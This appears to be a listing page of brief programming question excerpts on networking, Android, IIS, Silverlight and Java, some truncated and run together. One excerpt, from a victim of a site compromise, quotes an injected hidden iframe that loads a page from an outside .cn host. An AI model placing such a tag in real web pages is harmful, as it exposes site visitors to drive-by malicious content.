• Gethostname and IPv6

  Microsoft recommends not to use 'gethostname' on IPv6 and instead use 'getaddrinfo' or 'getnameinfo'. http://msdn.microsoft.com/en-us/library/ms899604.aspx But 'gethostname' doesn't seem to have any problem working on IPv6. Does anyone know any reason why 'gethostname' is not recommended on IPv6?

• Is there a POSIX syscall to resolve file system paths?

  Is there a POSIX syscall to resolve filesystem paths? I have the CWD for a path, as well as the path to a file from that CWD. I can't use chdir to switch to the directory because I need to resolve paths from multiple threads simultaneously. I considered appending a / in between the CWD and the path, but for some reason it feels like that's hacky. Is that the proper way to resolve relative paths?

  I have been developing my app for around two months, in the last week i have started getting the following error when trying to compile and run the app from Eclipse: java.io.IOException: Unable to upload file: No space left on device The APK comes out at 3.6Mb and the emulator is a recently created fresh one with 512Mb SD card and other specs identical to the G1. Can anyone suggest a reason this might be happening?

  I called my main activity Main, and Eclipse created Main.java and res/layout/main.xml for the layout. Is there any reason why Eclipse dropped the uppercase "M" for the layout file? Was I wrong to use upper case M for the name of my Main class (a Java convention, types start with uppercase, objects with lower case)?

I have a two questions: Do I have to create the schema at "build time" using ant or can I just ad-hock create them for validation when needed.   I faced a website attack problem that some malicious javascript code added to all pages in my webiste. Recently I faced another problem that my website is attacked with the following "iframe" tag. iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden" Even if I remove this tag, the index file of website is updated on daily basis.   I am receiving some strange begaviour in IE6 when printing a page. For some reason it is printing out parts of a CSS background image sprite. I have overridden all background-image declarations with: * {background-image:none !important;} But to no avail. I didn't think background images were supported by default anyways so this is a new one on me.

  I am using Silverlight 4 to access the web cam. Everything works ok when I start the web cam on a button click event, I get the prompt for permission. I would like the web cam to start when User Control loads, but for some reason when I run the same code on the Loaded event, I don't get a prompt when executing the following code:' CaptureDeviceConfiguration.RequestDeviceAccess() Does anyone have a work around for this?

  I have an Asp.Net MVC 2 web application deployed on IIS 7.5 on .Net 4.0. When I select application pool as Asp.Net v4.0 Classic I get the following error. HTTP Error 403.14 - Forbidden The Web server is configured to not list the contents of this directory. The same application works fine when I select application pool as Asp.Net v4.0 Integrated. • Weird Java Math ,10 ^ 1 = 11?

  For an exercise I was writing a loop that turns a string into an integer without using the built in functions by multiplying each individual value by its numerical position. 75 would be 7*(10 ^ 1) + 5*(10 ^ 0), for example. However, for some reason (10 ^ 1) keeps coming back as 11. Is there some mistake I have made or an explanation for this?

  Hi, We've got a .NET client calling a Java WebService hosted on Glassfish. Sometimes, for no clear reason, we get the error stated above. It appears that the first letter of the method ("P" of "POST") is dropped somehow. This is not consistent though, so we have no idea how to reproduce it. The communication is done over SSL.
